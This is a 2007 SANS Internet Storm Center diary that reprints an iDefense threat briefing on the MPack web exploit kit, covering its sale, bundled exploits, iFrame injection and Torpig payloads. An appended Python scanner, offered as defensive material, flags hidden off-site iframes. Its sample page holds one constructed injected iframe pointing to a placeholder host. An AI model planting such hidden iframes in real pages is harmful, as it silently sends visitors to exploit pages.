http://isc.sans.org/diary.html?n&storyid=3015
MPack Analysis
Published: 2007-06-20,
Last Updated: 2007-06-20 21:42:28 UTC
by Marcus Sachs (Version: 1)
We mentioned a large MPack compromise in a diary two days ago. Since
then we've been accumulating more information about what is going on
behind the scenes. Earlier today VeriSign/iDefense released some pretty
good analysis of how it works, what the value of it is, and other
goodies. This summary does not exist online but has been spread via
email to the media and other outlets. Rather than trying to summarize
it, iDefense gave the Internet Storm Center permission to reprint it in
its entirety. Thanks, iDefense!
Greetings All,
MPack is the latest and greatest tool for sale on the Russian
Underground. $ash sells MPack for around $500-1,000. In a recent
posting $ash attempted to sell a "loader" for $300 and a kit for $1,000.
The author claims that attacks are 45-50 percent successful, including
the animated cursor exploit and many others, including ANI overflow,
MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow,
WinZip ActiveX Overflow, QuickTime Overflow (all these are $ash names
for exploits). Attacks from MPack, aka WebAttacker II, date back to
October 2006 and account for roughly 10 percent of web based
exploitation today according to one public source.
More than 10,000 referral domains exist in a recent, largely
successful MPack attack in Italy, compromising at least 80,000
unique IP addresses. It is likely that cPanel exploitation took place on
the host provider, leading to injected iFrames on domains hosted on the
server. When a legitimate page with a hostile iFrame is loaded the tool
silently redirects the victim in an iFrame to an exploit page crafted by
MPack. This exploit page, in a very controlled manner, executes exploits
until exploitation is successful, and then installs malicious code of
the attacker's choice.
Torpig is one of the known payloads for MPack attacks to date. This
code relates back to the Russian Business Network (RBN), through which
many Internet-based attacks take place today. The RBN is a virtual safe
house for attacks out of Saint Petersburg, Russia, responsible for
Torpig and other malicious code attacks, phishing attacks, child
pornography and other illicit operations. The Italian hosts responsible
for most of the domains seen in a recent MPack attack are using cPanel,
a Web administration tool for clients. A zero-day cPanel attack took
place in the fall of 2006 leading up to the large scale vector mark-up
language (VML) attacks at that time. It appears likely that the Russian
authors of the cPanel exploit, Step57.info, who are also related to the
RBN, used the exploit to compromise the Italian ISP and referral domains
used in the latest MPack attack.
MPack uses a command and control website interface for reporting of
MPack success. A JPEG screenshot of a recent attack is attached to this
message.
QUOTES
1. MPack is a powerful Web exploitation tool that claims about 50
percent success in attacks silently launched against Web browsers.
2. $ash is the primary Russian actor attempting to sell MPack on the
underground, for about $1,000 for the complete MPack kit.
3. MPack leverages multiple exploits, in a very controlled manner,
to compromise vulnerable computers. Exploits range from the recent
animated cursor (ANI) to QuickTime exploitation. The latest version of
MPack, .90, includes the following exploits:
MS06-014
MS06-006
MS06-044
MS06-071
MS06-057
WinZip ActiveX overflow
QuickTime overflow
MS07-017
4. The Russian Business Network (RBN) is one of the most notorious
criminal groups on the Internet today. A recent MPack attack installed
Torpig malicious code hosted on an RBN server. RBN is closely tied to
multiple attacks including Step57.info cPanel exploitation, VML,
phishing, child pornography, Torpig, Rustock, and many other criminal
attacks to date. Nothing good ever comes out of the Russian Business
Network net block.
5. MPack attacks experience high success, according to attack log
files analyzed by VeriSign-iDefense. In just a few hours more than
2,000 new victims reported to an MPack command and control website. A
recent attack, largely focused in the area of Italy, involved more than
80,000 unique IPs.
Ken Dunham
Senior Engineer
Director of the Rapid Response Team
VeriSign-iDefense
CISSP, GREM, GSEC, GCIH Gold Honors
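The injection mechanism the iDefense note describes (a hostile iFrame planted on a legitimate page that silently loads an off-site exploit page) is something a site operator can scan their own content for. The Python below is an added example written for this diary, not code from iDefense, the ISC, or the MPack kit: it parses a page, collects every iframe tag, and flags those that are hidden (zero-size or CSS-hidden) or whose src points to a host other than the page's own. The sample page, the hostnames in it, and the function names are constructed placeholders.

```python
"""Scan HTML for iframes that look injected: hidden, or loading an off-site page."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # HTMLParser lowercases attribute names; a valueless attribute arrives as None
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_hidden(attrs):
    """Zero/one-pixel dimensions or CSS hiding are the usual ways an injected frame stays invisible."""
    for dim in ("width", "height"):
        val = attrs.get(dim, "").strip().rstrip("px")
        if val.isdigit() and int(val) <= 1:
            return True
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    return any(t in style for t in ("display:none", "visibility:hidden", "width:0", "height:0"))


def find_suspicious_iframes(page_url, html):
    """Return [(src, [reasons])] for iframes that are hidden and/or point off-site."""
    parser = IframeCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        src_host = urlparse(src).hostname or ""  # relative src has no host -> same site
        reasons = []
        if src_host and src_host != page_host:
            reasons.append("off-site src")
        if _is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: one legitimate same-site frame and one injected, invisible,
# off-site frame of the kind the note describes. Hostnames are placeholders (.invalid TLD).
SAMPLE_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="/embed/video.html" width="400" height="300"></iframe>
<p>Contact us</p>
<iframe src="http://injected-host.invalid/in.cgi?3" width=0 height=0
        style="visibility: hidden"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes("http://legit-site.example/index.html", SAMPLE_PAGE):
        print(f"suspicious iframe: {src} ({', '.join(reasons)})")
```

Run it over pages pulled from your own web root; a frame that is both hidden and off-site is the strongest signal, while a visible off-site frame may simply be a legitimate embed and deserves a look rather than an alarm.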
Marcus H. Sachs
Director, SANS Internet Storm Center